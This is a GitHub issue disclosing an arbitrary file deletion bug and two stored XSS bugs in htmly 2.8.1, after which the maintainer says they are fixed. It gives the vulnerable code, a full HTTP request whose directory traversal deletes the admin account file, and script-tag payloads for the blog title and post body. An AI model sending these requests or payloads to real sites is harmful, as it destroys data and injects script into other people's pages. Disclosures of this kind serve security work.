Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary file deletion and Persistent XSS exists on htmly 2.8.1 #481

Closed
fuzz7j opened this issue Jul 11, 2021 · 2 comments
Closed

Arbitrary file deletion and Persistent XSS exists on htmly 2.8.1 #481

fuzz7j opened this issue Jul 11, 2021 · 2 comments

Comments

@fuzz7j
Copy link

fuzz7j commented Jul 11, 2021

1. An Arbitrary file deletion vulnerability in the backend

In htmly-2.8.1\system\admin\views\backup.html.php
line 7

if (!empty($file)) {
    unlink("backup/$file");
}

When we delete our backup files, we can delete any files on the system through directory traversal.
delFile1

example:
When we login, we can go to setting -> backup -> Creat back, then we client delete, we can get a link. when we modify the file field to /config/users/admin.ini and submit.

GET /admin/backup?file=../config/users/admin.ini&submit=Delete HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.3:8888/admin/backup
Cookie: CSRF_TOKEN=ncDpMG6sz9cWAhPp; kodUserID=1; __51uvsct__JH8lWQvr8bXXIzV9=2; __51vcke__JH8lWQvr8bXXIzV9=c469
5bd5-02b6-5295-974b-e8ddcfdf0022; __51vuft__JH8lWQvr8bXXIzV9=1625743826644; HOST=http%3A//10.211.55.3%3A88/; APP_HOST=http%3A//10.211.55.3%3A88/; kodUserLanguage=zh-CN; kodVersionCheck=check-at-1625809444; X-CSRF-TOKEN=m655d6hVx8EiMrw2nNue; PHPSESSID=4pau0op8l24alsd5sps034a4l2
Upgrade-Insecure-Requests: 1

The administrator information has been deleted and no one can login to the system.

2. Persistent XSS on Blog title

Since the Blog title is not processed by htmlentities
blogtitleXss3
when we modify the Blog title to <script>alert(/test/)</script>, Javascript is executed.
blogtitleXss1
blogtitleXss2

3. Persistent XSS on Creating regular blog post.

When we Creating regular blog post. Enter in Content
</div><script>alert(/xxx/)</script> and visit this article, Javascript is executed.
contentXss1
contentXss2

@danpros
Copy link
Owner

danpros commented Jul 11, 2021

Hello,

This has been fixed in repo. See #463

@danpros
Copy link
Owner

danpros commented Jul 12, 2021

Please see this one #481

@danpros danpros closed this as completed Jul 12, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants